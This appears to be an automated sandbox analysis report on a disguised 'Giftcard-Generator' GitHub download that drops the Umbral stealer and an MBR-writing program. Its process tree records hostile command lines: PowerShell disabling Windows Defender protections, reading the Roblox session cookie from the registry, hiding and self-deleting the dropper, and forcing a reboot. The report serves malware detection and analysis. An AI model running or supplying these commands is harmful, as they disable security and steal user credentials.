Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-05-2024 14:58

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/Cyendd/Giftcard-Generator/archive/refs/heads/main.zip

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Cyendd/Giftcard-Generator/archive/refs/heads/main.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8797646f8,0x7ff879764708,0x7ff879764718
      2⤵
        PID:2988
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
        2⤵
          PID:2176
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1428
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
          2⤵
            PID:1084
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
            2⤵
              PID:1524
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
              2⤵
                PID:1916
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                2⤵
                  PID:1424
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4816
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5060 /prefetch:8
                  2⤵
                    PID:3888
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
                    2⤵
                      PID:3300
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4900
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
                      2⤵
                        PID:5812
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                        2⤵
                          PID:5820
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
                          2⤵
                            PID:5704
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                            2⤵
                              PID:5708
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
                              2⤵
                                PID:732
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2688
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4652
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:1720
                                  • C:\Users\Admin\Downloads\Giftcard-Generator-main\Giftcard-Generator-main\loader.exe
                                    "C:\Users\Admin\Downloads\Giftcard-Generator-main\Giftcard-Generator-main\loader.exe"
                                    1⤵
                                      PID:5296
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe"
                                        2⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5440
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" csproduct get uuid
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5536
                                        • C:\Windows\SYSTEM32\attrib.exe
                                          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe"
                                          3⤵
                                          • Views/modifies file attributes
                                          PID:5612
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe'
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5660
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5968
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4512
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5384
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" os get Caption
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5740
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" computersystem get totalphysicalmemory
                                          3⤵
                                            PID:5720
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" csproduct get uuid
                                            3⤵
                                              PID:6096
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:6024
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              "wmic" path win32_VideoController get name
                                              3⤵
                                              • Detects videocard installed
                                              PID:5264
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe" && pause
                                              3⤵
                                                PID:3024
                                                • C:\Windows\system32\PING.EXE
                                                  ping localhost
                                                  4⤵
                                                  • Runs ping.exe
                                                  PID:5572
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe
                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Writes to the Master Boot Record (MBR)
                                              PID:5560
                                              • C:\Windows\SysWOW64\shutdown.exe
                                                shutdown.exe -r -f -t 0
                                                3⤵
                                                  PID:5420
                                                • C:\Windows\SysWOW64\shutdown.exe
                                                  C:\Windows\System32\shutdown.exe -r -f -t 0
                                                  3⤵
                                                    PID:5456
                                              • C:\Windows\system32\LogonUI.exe
                                                "LogonUI.exe" /flags:0x4 /state0:0xa3901055 /state1:0x41c64e6d
                                                1⤵
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5744
                                              • C:\Windows\System32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                1⤵
                                                  PID:5912

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  2daa93382bba07cbc40af372d30ec576

                                                  SHA1

                                                  c5e709dc3e2e4df2ff841fbde3e30170e7428a94

                                                  SHA256

                                                  1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30

                                                  SHA512

                                                  65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  ecdc2754d7d2ae862272153aa9b9ca6e

                                                  SHA1

                                                  c19bed1c6e1c998b9fa93298639ad7961339147d

                                                  SHA256

                                                  a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7

                                                  SHA512

                                                  cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  5KB

                                                  MD5

                                                  ce4e1a1361515516a644509c7ee57966

                                                  SHA1

                                                  2f2ac41792b1ddf1ea8a9309317801a05b4e9b6e

                                                  SHA256

                                                  ccf080a4fa27723ddce6a97172b86797e7549fa0fa4327afa92178d45bcac542

                                                  SHA512

                                                  11f5d3f1eabe34821f05b9114eff10560cd4dbf05723a3321b983f76af49d2f1c0b35bd04a0582a837c6ec3261f4a7f7ddd75f711aedd13d650ab39fd26a6b30

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  b8f697a388ebfe8b3b80d75a72dd722b

                                                  SHA1

                                                  d856e9839cbfdb46fdd7904359d1da2fd205337d

                                                  SHA256

                                                  b7e7efd599869ea7fa9bbd499f9f100e3a48f6c31ed3d6b6fd209661cef63e73

                                                  SHA512

                                                  6131bd9374aa3f3763c2144171ed06464cedd470a484e80d3a24c89885e1b969302b313e15652cd3e4ee39ffaf796e75ce56a8270472067ac1e31247ef3c170a

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                  Filesize

                                                  16B

                                                  MD5

                                                  6752a1d65b201c13b62ea44016eb221f

                                                  SHA1

                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                  SHA256

                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                  SHA512

                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  a7c4f3799b7fde4556b9c554a26110b1

                                                  SHA1

                                                  0ea82b615601f5998f55d830ee2b15fdebefba99

                                                  SHA256

                                                  26fc3f2273e28b93916e8a1d4f448a5c9fc7005c6dc7a14907e1fb543926fb1a

                                                  SHA512

                                                  1abca9d5763afcaaa2d693d93e025b69a2e0d623bae5f975c40e40fe30f399ad41025b45138627640cbff06ee9dbe5d7d23d42dd174e4f48b6d41f366abd5ed1

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  3d933cce3dd61ebe6598bb882da3af8d

                                                  SHA1

                                                  c98d1d02fba00d7c96a7ed1877406bf68d55d27e

                                                  SHA256

                                                  9601078b901c5a25863fc57ce2e69465576f14727fb7cc35d54240ba135e79b0

                                                  SHA512

                                                  8b50e9c51f7a6fd6319b3dffd99ac46125637e1b88aed6207ac402ef532325715753202c9d5f84ce92a4d5b17f2b61ee93b2df9c27a43097fa7591cdabbbfc88

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  6d42b6da621e8df5674e26b799c8e2aa

                                                  SHA1

                                                  ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                  SHA256

                                                  5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                  SHA512

                                                  53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  948B

                                                  MD5

                                                  c65738617888921a153bd9b1ef516ee7

                                                  SHA1

                                                  5245e71ea3c181d76320c857b639272ac9e079b1

                                                  SHA256

                                                  4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

                                                  SHA512

                                                  2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  276798eeb29a49dc6e199768bc9c2e71

                                                  SHA1

                                                  5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                  SHA256

                                                  cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                  SHA512

                                                  0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  ca58d1913d3261f116a299095e04f734

                                                  SHA1

                                                  941d13d0c8c65adb6513f23991acfa0d62facdea

                                                  SHA256

                                                  755daf72f2f5e983abb009c3b1eef4c7c660999f5ff581545bbcae7088c17c69

                                                  SHA512

                                                  87b0d8c9a5348235e9ad6416e09665764db1af408bf763857dc40e39411fa0cf405e3e8b9f0b8540c72aa874059d1dee865aa0cff8dba0fde5779ec9480b5e40

                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe

                                                  Filesize

                                                  229KB

                                                  MD5

                                                  2f7917208470cb60a461821bd3bd7b38

                                                  SHA1

                                                  60439ca8b3355d217a1ece1f059adfdc893a15a4

                                                  SHA256

                                                  bcd85c22f2dc22bfaca369c126912de4ddae0be03bdf69d6ed7bcbc51668a191

                                                  SHA512

                                                  2f961f422cc7f66326708e832031ffaf2c4efea2ca1f5129e7d07bf056faf3d11046a161c36f69dbd3043d6f353a9e0cc943a94fed9fcd73e5bc64855d94d699

                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe

                                                  Filesize

                                                  71KB

                                                  MD5

                                                  bfe57939db2d2e05f2c01d9810c414cd

                                                  SHA1

                                                  502fbf4cdb80eccee2798efa7bf81d2fe6b21420

                                                  SHA256

                                                  2a9e09c96ab0dbf75f4c1277295ca5e16345698415b35da414d9954ddaa8de98

                                                  SHA512

                                                  6b9cf57859162d92ee0b7b26d613e935b194047f26e8e7ebd1cbab452014e90a30e5a14004ad385713c536f9b8b72f95f8e9d8b848d4522c4693ed7f8ee8e13b

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a01e4xrl.twn.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\Downloads\Giftcard-Generator-main.zip

                                                  Filesize

                                                  283KB

                                                  MD5

                                                  6e614f123bf3c9ef51aec7e517387008

                                                  SHA1

                                                  caef2512f74331cf59860e8059d58fb57222269c

                                                  SHA256

                                                  64b42c91eefced7635415b0a29cf7edbef38861faaf8050238fcbe802ef731a3

                                                  SHA512

                                                  4f7e581e9a1962a8f349c469c4e1fd209c22fa4c9184ac9dc0ab6a81476be8ddb47928cbba1a7c75c93826cfc07707563c17e65c5eadc37892740ed3cc529e4c

                                                • C:\Windows\system32\drivers\etc\hosts

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  4028457913f9d08b06137643fe3e01bc

                                                  SHA1

                                                  a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

                                                  SHA256

                                                  289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

                                                  SHA512

                                                  c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                                                • memory/5440-124-0x0000023EFFF50000-0x0000023EFFF6E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                • memory/5440-122-0x0000023F00080000-0x0000023F000D0000-memory.dmp

                                                  Filesize

                                                  320KB

                                                • memory/5440-121-0x0000023F00000000-0x0000023F00076000-memory.dmp

                                                  Filesize

                                                  472KB

                                                • memory/5440-160-0x0000023EE7710000-0x0000023EE771A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                • memory/5440-161-0x0000023EFFF90000-0x0000023EFFFA2000-memory.dmp

                                                  Filesize

                                                  72KB

                                                • memory/5440-91-0x0000023EE5A30000-0x0000023EE5A70000-memory.dmp

                                                  Filesize

                                                  256KB

                                                • memory/5560-190-0x0000000000400000-0x000000000043F000-memory.dmp

                                                  Filesize

                                                  252KB

                                                • memory/5660-97-0x00000248B2680000-0x00000248B26A2000-memory.dmp

                                                  Filesize

                                                  136KB